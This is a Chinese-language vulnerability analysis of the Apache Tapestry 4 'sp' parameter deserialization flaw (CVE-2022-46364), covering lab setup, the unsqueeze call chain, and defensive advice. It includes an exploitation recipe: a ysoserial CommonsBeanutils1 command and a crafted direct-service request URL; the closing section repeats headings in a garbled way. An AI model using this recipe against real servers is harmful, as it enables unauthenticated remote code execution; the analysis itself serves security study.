Apache Tapestry 4 反序列化漏洞分析与利用<\/h1>

漏洞概述<\/h2>
Apache Tapestry 4 框架中存在一个 Java 反序列化漏洞（CVE-2022-46364），攻击者可以通过构造特殊的"sp"参数触发反序列化操作，无需身份验证即可实现远程代码执行。该漏洞存在于2008年就已停止更新的Tapestry 4版本中，属于一个"上古时代"框架的安全问题。<\/p>

环境搭建<\/h2>

依赖准备<\/h3>

Tapestry 4.1.6 可通过Maven仓库获取：<\/p>

<dependency><\/span>
<\/span><\/span>  <groupId><\/span>org.apache.tapestry<\/groupId><\/span>
<\/span><\/span>  <artifactId><\/span>tapestry-framework<\/artifactId><\/span>
<\/span><\/span>  <version><\/span>4.1.6<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><\/code><\/pre><\/li>

推荐使用JDK 1.6环境运行，JDK 1.8可能无法正常工作<\/p>
<\/li>
<\/ol>
Web配置<\/h3>
web.xml 配置示例：<\/p>
<web-app<\/span> version=<\/span>"2.4"<\/span> xmlns=<\/span>"http:\/\/java.sun.com\/xml\/ns\/j2ee"<\/span>><\/span>
<\/span><\/span>  <servlet><\/span>
<\/span><\/span>    <servlet-name><\/span>ApplicationServlet<\/servlet-name><\/span>
<\/span><\/span>    <servlet-class><\/span>org.apache.tapestry.ApplicationServlet<\/servlet-class><\/span>
<\/span><\/span>  <\/servlet><\/span>
<\/span><\/span>  <servlet-mapping><\/span>
<\/span><\/span>    <servlet-name><\/span>ApplicationServlet<\/servlet-name><\/span>
<\/span><\/span>    <url-pattern><\/span>\/app<\/url-pattern><\/span>
<\/span><\/span>  <\/servlet-mapping><\/span>
<\/span><\/span><\/web-app><\/span>
<\/span><\/span><\/code><\/pre>页面结构<\/h3>
Tapestry 4 页面通常由三个文件组成：<\/p>

模板文件：[name].html<\/code><\/li>
页面文件：[name].page<\/code><\/li>
处理类：[name].class<\/code>（类名可自定义）<\/li>
<\/ol>
漏洞分析<\/h2>
攻击入口<\/h3>
漏洞的核心在于"sp"参数（Service Parameter的缩写），该参数会被框架自动处理并可能导致反序列化操作。<\/p>
服务路由<\/h3>
Tapestry 4 的服务请求格式：<\/p>
\/app?service=external\/[PageName]&sp=[param 0]&sp=param[1]
<\/code><\/pre>
主要服务接口为IEngineService<\/code>，有以下关键实现类：<\/p>

ExternalService<\/code><\/li>
DirectService<\/code><\/li>
DirectEventService<\/code><\/li>
<\/ul>
反序列化调用链<\/h3>
完整的反序列化调用链如下：<\/p>

LinkFactoryImpl#extractListenerParameters<\/code><\/li>
DataSqueezer#unsqueeze<\/code><\/li>
DataSqueezerImpl#unsqueeze<\/code><\/li>
SqueezeAdaptor#unsqueeze<\/code><\/li>
SerializableAdaptor#unsqueeze<\/code><\/li>
ObjectInputStream#readObject<\/code><\/li>
<\/ol>
关键代码分析<\/h3>
在DataSqueezerImpl<\/code>中，根据参数首字母选择适配器：<\/p>
char<\/span> prefix =<\/span> encoded.<\/span>charAt<\/span>(<\/span>0<\/span>);<\/span>
<\/span><\/span>SqueezeAdaptor adaptor =<\/span> this<\/span>.<\/span>_adaptorByPrefix<\/span>[<\/span>prefix -<\/span> 33<\/span>];<\/span>
<\/span><\/span><\/code><\/pre>SerializableAdaptor<\/code>对应的前缀字符：<\/p>

'O' (ASCII 79)<\/li>
'Z' (ASCII 90)<\/li>
<\/ul>
'Z'表示GZIP压缩后的数据，'O'表示纯Base64编码数据。<\/p>
漏洞利用<\/h2>
利用条件<\/h3>

目标页面包含Form<\/code>或DirectLink<\/code>组件（通过jwcid<\/code>属性标识）<\/li>
组件允许接收String类型输入<\/li>
知道目标组件的componentId<\/li>
<\/ol>
攻击步骤<\/h3>

构造反序列化Payload（使用Commons Beanutils等常见库）<\/li>
Base64编码Payload，前缀加上'O'<\/li>
发送请求：
\/app?service=direct&sp=O[Base64Payload]&page=Form&component=$Form
<\/code><\/pre>
<\/li>
<\/ol>
示例Payload<\/h3>
使用ysoserial生成CommonsBeanutils1的Payload：<\/p>
java -jar ysoserial.jar CommonsBeanutils1 "calc"<\/span> | base64
<\/span><\/span><\/code><\/pre>构造最终参数：<\/p>
sp=O[rO0AB....(base64 encoded payload)]
<\/code><\/pre>
防御措施<\/h2>

升级到Tapestry 5或更高版本<\/li>
若必须使用Tapestry 4，应实施以下防护：

过滤反序列化操作<\/li>
使用安全管理器限制危险操作<\/li>
对输入参数进行严格校验<\/li>
<\/ul>
<\/li>
<\/ol>
总结<\/h2>
该漏洞展示了老旧框架中存在的安全隐患，通过精心构造的"sp"参数，攻击者可利用内置的反序列化功能实现RCE。漏洞利用需要特定组件支持，但在实际应用中，表单(Form)组件非常常见，使得该漏洞具有较高的实际危害性。<\/p>

Apache Tapestry 4 反序列化漏洞分析与利用<\/h1>

环境搭建<\/h2>

漏洞分析<\/h2>

攻击入口<\/h3> 漏洞的核心在于"sp"参数（Service Parameter的缩写），该参数会被框架自动处理并可能导致反序列化操作。<\/p>

漏洞利用<\/h2>

攻击入口<\/h3>
漏洞的核心在于"sp"参数（Service Parameter的缩写），该参数会被框架自动处理并可能导致反序列化操作。<\/p>